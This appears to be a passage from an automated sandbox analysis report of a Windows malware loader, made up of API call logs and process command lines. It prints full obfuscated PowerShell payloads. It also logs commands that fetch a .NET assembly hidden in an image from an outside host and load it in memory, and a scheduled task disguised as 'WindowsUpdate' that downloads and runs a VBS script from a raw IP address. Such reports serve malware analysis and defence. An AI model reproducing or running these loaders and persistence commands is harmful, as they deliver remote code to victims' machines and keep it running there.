#bQBl#@$#G4#@$#d#@$#Bz#@$#C#@$##@$#PQ#@$#g#@$#Cw#@$#K#@$##@$#n#@$#HQ#@$#e#@$#B0#@$#C4#@$#cwBn#@$#G4#@$#aQB0#@$#HQ#@$#ZQBz#@$#C8#@$#U#@$#BT#@$#FM#@$#Lw#@$#5#@$#Dg#@$#Lg#@$#5#@$#DM#@$#Mg#@$#u#@$#DQ#@$#OQ#@$#u#@$#DM#@$#Mg#@$#v#@$#C8#@$#OgBw#@$#HQ#@$#d#@$#Bo#@$#Cc#@$#KQ#@$#7#@$#CQ#@$#bQBl#@$#HQ#@$#a#@$#Bv#@$#GQ#@$#LgBJ#@$#G4#@$#dgBv#@$#Gs#@$#ZQ#@$#o#@$#CQ#@$#bgB1#@$#Gw#@$#b#@$##@$#s#@$#C#@$##@$#J#@$#Bh#@$#HI#@$#ZwB1#@$#G0#@$#ZQBu#@$#HQ#@$#cw#@$#p#@$##@$#==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('#@$#','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
filepath: powershell
1 1 0

CreateProcessInternalW

 thread_identifier: 2652
thread_handle: 0x0000044c
process_identifier: 2648
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/559/510/original/rump_private.jpg?1690504129';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.sgnittes/PSS/98.932.49.32//:ptth');$method.Invoke($null, $arguments)"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x00000450
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received [
Data received WdÔ1dH|Ée;ß~‘Ÿ¬ÖÉï/ø‘DOWNGRD ‡sJdµ‹¥âè›cÓÎÿ¾kfdr,Ñç*Á#TÈÀ ÿ 
Data received O
Data received “
Data received AKÕ<Y>fAM–q@éÄå°ÐA$9YGÆ8ªés!À‰ŠvÝÔ¢4.‘¦ŠVXéȉíoÓÞ%6®”®J­H0F!´l _&;uF·˜˜<ƒ×”cM·A’€»Zîá Cøþz!ð'^ŸNç[ܱùTË{éTX°À®Õ!ýÚ€!¹
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received øô_ Âñ£ˆÕÛ£}}Ïò»4JŒ‰ŸÅ…/jSÆ \3ÖÜϒ¬pšš‡ìâd˜
Data sent yudÔ1Z4Çü~¶†‰ûÁëp§*´S=>!˜íà-/5 ÀÀÀ À 284ÿuploaddeimagens.com.br  
Data sent FBA ›ì,¿KÐ+ÐCüXôÍB”«Ôµ~ªGXEôE$%âgܞ)•&¿ïÂ<eº¥Ó9¢8k¹0'%{Géþ0`…›¥1f„Ã®Ymíæ³zÂÂ(Ӟ<®Ä¨îèß\ìvêЂÃÚï}È¥
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
cmdline "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 100 /tn "WindowsUpdate" /tr "\"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe\" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command curl http://23.94.239.89/520/b/update.vbs -o C:\Windows\Temp\hkcmd.vbs;Start-Process powershell.exe C:\Windows\Temp\hkcmd.vbs -NoNewWindow
cmdline schtasks /create /sc MINUTE /mo 100 /tn "WindowsUpdate" /tr "\"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe\" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command curl http://23.94.239.89/520/b/update.vbs -o C:\Windows\Temp\hkcmd.vbs;Start-Process powershell.exe C:\Windows\Temp\hkcmd.vbs -NoNewWindow
host 23.94.239.89
cmdline "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 100 /tn "WindowsUpdate" /tr "\"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe\" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command curl http://23.94.239.89/520/b/update.vbs -o C:\Windows\Temp\hkcmd.vbs;Start-Process powershell.exe C:\Windows\Temp\hkcmd.vbs -NoNewWindow
cmdline schtasks /create /sc MINUTE /mo 100 /tn "WindowsUpdate" /tr "\"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe\" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command curl http://23.94.239.89/520/b/update.vbs -o C:\Windows\Temp\hkcmd.vbs;Start-Process powershell.exe C:\Windows\Temp\hkcmd.vbs -NoNewWindow
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
Time & API Arguments Status Return Repeated

send

 buffer: yudÔ1Z4Çü~¶†‰ûÁëp§*´S=>!˜íà-/5 ÀÀÀ À 284ÿuploaddeimagens.com.br  
socket: 1444
sent: 126
1 126 0

send

 buffer: FBA ›ì,¿KÐ+ÐCüXôÍB”«Ôµ~ªGXEôE$%âgܞ)•&¿ïÂ<eº¥Ó9¢8k¹0'%{Géþ0`…›¥1f„Ã®Ymíæ³zÂÂ(Ӟ<®Ä¨îèß\ìvêЂÃÚï}È¥
socket: 1444
sent: 134
1 134 0

WSASend

 buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com
socket: 2020
0 0
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/559/510/original/rump_private.jpg?1690504129';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.sgnittes/PSS/98.932.49.32//:ptth');$method.Invoke($null, $arguments)"
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\Temp\hkcmd.vbs
parent_process powershell.exe martian_process "C:\util\curl\curl.exe" http://23.94.239.89/520/b/update.vbs -o C:\Windows\Temp\hkcmd.vbs
parent_process wscript.exe martian_process schtasks /create /sc MINUTE /mo 100 /tn "WindowsUpdate" /tr "\"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe\" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command curl http://23.94.239.89/520/b/update.vbs -o C:\Windows\Temp\hkcmd.vbs;Start-Process powershell.exe C:\Windows\Temp\hkcmd.vbs -NoNewWindow
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& { curl http://23.94.239.89/520/b/update.vbs -o C:\Windows\Temp\hkcmd.vbs; Start-Process powershell.exe C:\Windows\Temp\hkcmd.vbs -NoNewWindow }"
parent_process wscript.exe martian_process C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& { curl http://23.94.239.89/520/b/update.vbs -o C:\Windows\Temp\hkcmd.vbs; Start-Process powershell.exe C:\Windows\Temp\hkcmd.vbs -NoNewWindow }"
parent_process wscript.exe martian_process "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 100 /tn "WindowsUpdate" /tr "\"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe\" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command curl http://23.94.239.89/520/b/update.vbs -o C:\Windows\Temp\hkcmd.vbs;Start-Process powershell.exe C:\Windows\Temp\hkcmd.vbs -NoNewWindow
parent_process powershell.exe martian_process "C:\Windows\System32\WScript.exe" "C:\Windows\Temp\hkcmd.vbs"
parent_process wscript.exe martian_process powershell -command $Codigo = 'J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#VQBy#@$#Gw#@$#I#@$##@$#9#@$#C#@$##@$#JwBo#@$#HQ#@$#d#@$#Bw#@$#HM#@$#Og#@$#v#@$#C8#@$#dQBw#@$#Gw#@$#bwBh#@$#GQ#@$#Z#@$#Bl#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBu#@$#HM#@$#LgBj#@$#G8#@$#bQ#@$#u#@$#GI#@$#cg#@$#v#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBz#@$#C8#@$#M#@$##@$#w#@$#DQ#@$#Lw#@$#1#@$#DU#@$#OQ#@$#v#@$#DU#@$#MQ#@$#w#@$#C8#@$#bwBy#@$#Gk#@$#ZwBp#@$#G4#@$#YQBs#@$#C8#@$#cgB1#@$#G0#@$#c#@$#Bf#@$#H#@$##@$#cgBp#@$#HY#@$#YQB0#@$#GU#@$#LgBq#@$#H#@$##@$#Zw#@$#/#@$#DE#@$#Ng#@$#5#@$#D#@$##@$#NQ#@$#w#@$#DQ#@$#MQ#@$#y#@$#Dk#@$#Jw#@$#7#@$#CQ#@$#dwBl#@$#GI#@$#QwBs#@$#Gk#@$#ZQBu#@$#HQ#@$#I#@$##@$#9#@$#C#@$##@$#TgBl#@$#Hc#@$#LQBP#@$#GI#@$#agBl#@$#GM#@$#d#@$##@$#g#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#TgBl#@$#HQ#@$#LgBX#@$#GU#@$#YgBD#@$#Gw#@$#aQBl#@$#G4#@$#d#@$##@$#7#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#g#@$#D0#@$#I#@$##@$#k#@$#Hc#@$#ZQBi#@$#EM#@$#b#@$#Bp#@$#GU#@$#bgB0#@$#C4#@$#R#@$#Bv#@$#Hc#@$#bgBs#@$#G8#@$#YQBk#@$#EQ#@$#YQB0#@$#GE#@$#K#@$##@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBV#@$#HI#@$#b#@$##@$#p#@$#Ds#@$#J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#V#@$#Bl#@$#Hg#@$#d#@$##@$#g#@$#D0#@$#I#@$#Bb#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#V#@$#Bl#@$#Hg#@$#d#@$##@$#u#@$#EU#@$#bgBj#@$#G8#@$#Z#@$#Bp#@$#G4#@$#ZwBd#@$#Do#@$#OgBV#@$#FQ#@$#Rg#@$#4#@$#C4#@$#RwBl#@$#HQ#@$#UwB0#@$#HI#@$#aQBu#@$#Gc#@$#K#@$##@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBC#@$#Hk#@$#d#@$#Bl#@$#HM#@$#KQ#@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#EY#@$#b#@$#Bh#@$#Gc#@$#I#@$##@$#9#@$#C#@$##@$#Jw#@$#8#@$#Dw#@$#QgBB#@$#FM#@$#RQ#@$#2#@$#DQ#@$#XwBT#@$#FQ#@$#QQBS#@$#FQ#@$#Pg#@$#+#@$#Cc#@$#Ow#@$#k#@$#GU#@$#bgBk#@$#EY#@$#b#@$#Bh#@$#Gc#@$#I#@$##@$#9#@$#C#@$##@$#Jw#@$#8#@$#Dw#@$#QgBB#@$#FM#@$#RQ#@$#2#@$#DQ#@$#XwBF#@$#E4#@$#R#@$##@$#+#@$#D4#@$#Jw#@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#D0#@$#I#@$##@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBU#@$#GU#@$#e#@$#B0#@$#C4#@$#SQBu#@$#GQ#@$#ZQB4#@$#E8#@$#Zg#@$#o#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#EY#@$#b#@$#Bh#@$#Gc#@$#KQ#@$#7#@$#CQ#@$#ZQBu#@$#GQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#FQ#@$#ZQB4#@$#HQ#@$#LgBJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#TwBm#@$#Cg#@$#J#@$#Bl#@$#G4#@$#Z#@$#BG#@$#Gw#@$#YQBn#@$#Ck#@$#Ow#@$#k#@$#HM#@$#d#@$#Bh#@$#HI#@$#d#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#t#@$#Gc#@$#ZQ#@$#g#@$#D#@$##@$#I#@$##@$#t#@$#GE#@$#bgBk#@$#C#@$##@$#J#@$#Bl#@$#G4#@$#Z#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#t#@$#Gc#@$#d#@$##@$#g#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#Cs#@$#PQ#@$#g#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#EY#@$#b#@$#Bh#@$#Gc#@$#LgBM#@$#GU#@$#bgBn#@$#HQ#@$#a#@$##@$#7#@$#CQ#@$#YgBh#@$#HM#@$#ZQ#@$#2#@$#DQ#@$#T#@$#Bl#@$#G4#@$#ZwB0#@$#Gg#@$#I#@$##@$#9#@$#C#@$##@$#J#@$#Bl#@$#G4#@$#Z#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#t#@$#C#@$##@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#Ds#@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BD#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#FQ#@$#ZQB4#@$#HQ#@$#LgBT#@$#HU#@$#YgBz#@$#HQ#@$#cgBp#@$#G4#@$#Zw#@$#o#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#s#@$#C#@$##@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BM#@$#GU#@$#bgBn#@$#HQ#@$#a#@$##@$#p#@$#Ds#@$#J#@$#Bj#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#g#@$#D0#@$#I#@$#Bb#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#QwBv#@$#G4#@$#dgBl#@$#HI#@$#d#@$#Bd#@$#Do#@$#OgBG#@$#HI#@$#bwBt#@$#EI#@$#YQBz#@$#GU#@$#Ng#@$#0#@$#FM#@$#d#@$#By#@$#Gk#@$#bgBn#@$#Cg#@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BD#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#Ck#@$#Ow#@$#k#@$#Gw#@$#bwBh#@$#GQ#@$#ZQBk#@$#EE#@$#cwBz#@$#GU#@$#bQBi#@$#Gw#@$#eQ#@$#g#@$#D0#@$#I#@$#Bb#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#UgBl#@$#GY#@$#b#@$#Bl#@$#GM#@$#d#@$#Bp#@$#G8#@$#bg#@$#u#@$#EE#@$#cwBz#@$#GU#@$#bQBi#@$#Gw#@$#eQBd#@$#Do#@$#OgBM#@$#G8#@$#YQBk#@$#Cg#@$#J#@$#Bj#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#p#@$#Ds#@$#J#@$#B0#@$#Hk#@$#c#@$#Bl#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#b#@$#Bv#@$#GE#@$#Z#@$#Bl#@$#GQ#@$#QQBz#@$#HM#@$#ZQBt#@$#GI#@$#b#@$#B5#@$#C4#@$#RwBl#@$#HQ#@$#V#@$#B5#@$#H#@$##@$#ZQ#@$#o#@$#Cc#@$#RgBp#@$#GI#@$#ZQBy#@$#C4#@$#S#@$#Bv#@$#G0#@$#ZQ#@$#n#@$#Ck#@$#Ow#@$#k#@$#G0#@$#ZQB0#@$#Gg#@$#bwBk#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#d#@$#B5#@$#H#@$##@$#ZQ#@$#u#@$#Ec#@$#ZQB0#@$#E0#@$#ZQB0#@$#Gg#@$#bwBk#@$#Cg#@$#JwBW#@$#EE#@$#SQ#@$#n#@$#Ck#@$#Ow#@$#k#@$#GE#@$#cgBn#@$#HU#@$#bQBl#@$#G4#@$#d#@$#Bz#@$#C#@$##@$#PQ#@$#g#@$#Cw#@$#K#@$##@$#n#@$#HQ#@$#e#@$#B0#@$#C4#@$#cwBn#@$#G4#@$#aQB0#@$#HQ#@$#ZQBz#@$#C8#@$#U#@$#BT#@$#FM#@$#Lw#@$#5#@$#Dg#@$#Lg#@$#5#@$#DM#@$#Mg#@$#u#@$#DQ#@$#OQ#@$#u#@$#DM#@$#Mg#@$#v#@$#C8#@$#OgBw#@$#HQ#@$#d#@$#Bo#@$#Cc#@$#KQ#@$#7#@$#CQ#@$#bQBl#@$#HQ#@$#a#@$#Bv#@$#GQ#@$#LgBJ#@$#G4#@$#dgBv#@$#Gs#@$#ZQ#@$#o#@$#CQ#@$#bgB1#@$#Gw#@$#b#@$##@$#s#@$#C#@$##@$#J#@$#Bh#@$#HI#@$#ZwB1#@$#G0#@$#ZQBu#@$#HQ#@$#cw#@$#p#@$##@$#==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('#@$#','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#VQBy#@$#Gw#@$#I#@$##@$#9#@$#C#@$##@$#JwBo#@$#HQ#@$#d#@$#Bw#@$#HM#@$#Og#@$#v#@$#C8#@$#dQBw#@$#Gw#@$#bwBh#@$#GQ#@$#Z#@$#Bl#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBu#@$#HM#@$#LgBj#@$#G8#@$#bQ#@$#u#@$#GI#@$#cg#@$#v#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBz#@$#C8#@$#M#@$##@$#w#@$#DQ#@$#Lw#@$#1#@$#DU#@$#OQ#@$#v#@$#DU#@$#MQ#@$#w#@$#C8#@$#bwBy#@$#Gk#@$#ZwBp#@$#G4#@$#YQBs#@$#C8#@$#cgB1#@$#G0#@$#c#@$#Bf#@$#H#@$##@$#cgBp#@$#HY#@$#YQB0#@$#GU#@$#LgBq#@$#H#@$##@$#Zw#@$#/#@$#DE#@$#Ng#@$#5#@$#D#@$##@$#NQ#@$#w#@$#DQ#@$#MQ#@$#y#@$#Dk#@$#Jw#@$#7#@$#CQ#@$#dwBl#@$#GI#@$#QwBs#@$#Gk#@$#ZQBu#@$#HQ#@$#I#@$##@$#9#@$#C#@$##@$#TgBl#@$#Hc#@$#LQBP#@$#GI#@$#agBl#@$#GM#@$#d#@$##@$#g#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#TgBl#@$#HQ#@$#LgBX#@$#GU#@$#YgBD#@$#Gw#@$#aQBl#@$#G4#@$#d#@$##@$#7#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#g#@$#D0#@$#I#@$##@$#k#@$#Hc#@$#ZQBi#@$#EM#@$#b#@$#Bp#@$#GU#@$#bgB0#@$#C4#@$#R#@$#Bv#@$#Hc#@$#bgBs#@$#G8#@$#YQBk#@$#EQ#@$#YQB0#@$#GE#@$#K#@$##@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBV#@$#HI#@$#b#@$##@$#p#@$#Ds#@$#J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#V#@$#Bl#@$#Hg#@$#d#@$##@$#g#@$#D0#@$#I#@$#Bb#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#V#@$#Bl#@$#Hg#@$#d#@$##@$#u#@$#EU#@$#bgBj#@$#G8#@$#Z#@$#Bp#@$#G4#@$#ZwBd#@$#Do#@$#OgBV#@$#FQ#@$#Rg#@$#4#@$#C4#@$#RwBl#@$#HQ#@$#UwB0#@$#HI#@$#aQBu#@$#Gc#@$#K#@$##@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBC#@$#Hk#@$#d#@$#Bl#@$#HM#@$#KQ#@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#EY#@$#b#@$#Bh#@$#Gc#@$#I#@$##@$#9#@$#C#@$##@$#Jw#@$#8#@$#Dw#@$#QgBB#@$#FM#@$#RQ#@$#2#@$#DQ#@$#XwBT#@$#FQ#@$#QQBS#@$#FQ#@$#Pg#@$#+#@$#Cc#@$#Ow#@$#k#@$#GU#@$#bgBk#@$#EY#@$#b#@$#Bh#@$#Gc#@$#I#@$##@$#9#@$#C#@$##@$#Jw#@$#8#@$#Dw#@$#QgBB#@$#FM#@$#RQ#@$#2#@$#DQ#@$#XwBF#@$#E4#@$#R#@$##@$#+#@$#D4#@$#Jw#@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#D0#@$#I#@$##@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBU#@$#GU#@$#e#@$#B0#@$#C4#@$#SQBu#@$#GQ#@$#ZQB4#@$#E8#@$#Zg#@$#o#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#EY#@$#b#@$#Bh#@$#Gc#@$#KQ#@$#7#@$#CQ#@$#ZQBu#@$#GQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#FQ#@$#ZQB4#@$#HQ#@$#LgBJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#TwBm#@$#Cg#@$#J#@$#Bl#@$#G4#@$#Z#@$#BG#@$#Gw#@$#YQBn#@$#Ck#@$#Ow#@$#k#@$#HM#@$#d#@$#Bh#@$#HI#@$#d#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#t#@$#Gc#@$#ZQ#@$#g#@$#D#@$##@$#I#@$##@$#t#@$#GE#@$#bgBk#@$#C#@$##@$#J#@$#Bl#@$#G4#@$#Z#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#t#@$#Gc#@$#d#@$##@$#g#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#Cs#@$#PQ#@$#g#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#EY#@$#b#@$#Bh#@$#Gc#@$#LgBM#@$#GU#@$#bgBn#@$#HQ#@$#a#@$##@$#7#@$#CQ#@$#YgBh#@$#HM#@$#ZQ#@$#2#@$#DQ#@$#T#@$#Bl#@$#G4#@$#ZwB0#@$#Gg#@$#I#@$##@$#9#@$#C#@$##@$#J#@$#Bl#@$#G4#@$#Z#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#t#@$#C#@$##@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#Ds#@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BD#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#FQ#@$#ZQB4#@$#HQ#@$#LgBT#@$#HU#@$#YgBz#@$#HQ#@$#cgBp#@$#G4#@$#Zw#@$#o#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#s#@$#C#@$##@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BM#@$#GU#@$#bgBn#@$#HQ#@$#a#@$##@$#p#@$#Ds#@$#J#@$#Bj#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#g#@$#D0#@$#I#@$#Bb#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#QwBv#@$#G4#@$#dgBl#@$#HI#@$#d#@$#Bd#@$#Do#@$#OgBG#@$#HI#@$#bwBt#@$#EI#@$#YQBz#@$#GU#@$#Ng#@$#0#@$#FM#@$#d#@$#By#@$#Gk#@$#bgBn#@$#Cg#@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BD#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#Ck#@$#Ow#@$#k#@$#Gw#@$#bwBh#@$#GQ#@$#ZQBk#@$#EE#@$#cwBz#@$#GU#@$#bQBi#@$#Gw#@$#eQ#@$#g#@$#D0#@$#I#@$#Bb#@$#FM#@$#eQBz#@$#HQ#@$#ZQBt#@$#C4#@$#UgBl#@$#GY#@$#b#@$#Bl#@$#GM#@$#d#@$#Bp#@$#G8#@$#bg#@$#u#@$#EE#@$#cwBz#@$#GU#@$#bQBi#@$#Gw#@$#eQBd#@$#Do#@$#OgBM#@$#G8#@$#YQBk#@$#Cg#@$#J#@$#Bj#@$#G8#@$#bQBt#@$#GE#@$#bgBk#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#p#@$#Ds#@$#J#@$#B0#@$#Hk#@$#c#@$#Bl#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#b#@$#Bv#@$#GE#@$#Z#@$#Bl#@$#GQ#@$#QQBz#@$#HM#@$#ZQBt#@$#GI#@$#b#@$#B5#@$#C4#@$#RwBl#@$#HQ#@$#V#@$#B5#@$#H#@$##@$#ZQ#@$#o#@$#Cc#@$#RgBp#@$#GI#@$#ZQBy#@$#C4#@$#S#@$#Bv#@$#G0#@$#ZQ#@$#n#@$#Ck#@$#Ow#@$#k#@$#G0#@$#ZQB0#@$#Gg#@$#bwBk#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#d#@$#B5#@$#H#@$##@$#ZQ#@$#u#@$#Ec#@$#ZQB0#@$#E0#@$#ZQB0#@$#Gg#@$#bwBk#@$#Cg#@$#JwBW#@$#EE#@$#SQ#@$#n#@$#Ck#@$#Ow#@$#k#@$#GE#@$#cgBn#@$#HU#@$#bQBl#@$#G4#@$#d#@$#Bz#@$#C#@$##@$#PQ#@$#g#@$#Cw#@$#K#@$##@$#n#@$#HQ#@$#e#@$#B0#@$#C4#@$#cwBn#@$#G4#@$#aQB0#@$#HQ#@$#ZQBz#@$#C8#@$#U#@$#BT#@$#FM#@$#Lw#@$#5#@$#Dg#@$#Lg#@$#5#@$#DM#@$#Mg#@$#u#@$#DQ#@$#OQ#@$#u#@$#DM#@$#Mg#@$#v#@$#C8#@$#OgBw#@$#HQ#@$#d#@$#Bo#@$#Cc#@$#KQ#@$#7#@$#CQ#@$#bQBl#@$#HQ#@$#a#@$#Bv#@$#GQ#@$#LgBJ#@$#G4#@$#dgBv#@$#Gs#@$#ZQ#@$#o#@$#CQ#@$#bgB1#@$#Gw#@$#b#@$##@$#s#@$#C#@$##@$#J#@$#Bh#@$#HI#@$#ZwB1#@$#G0#@$#ZQBu#@$#HQ#@$#cw#@$#p#@$##@$#==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('#@$#','A') ) );powershell.exe -windowstyle hidden 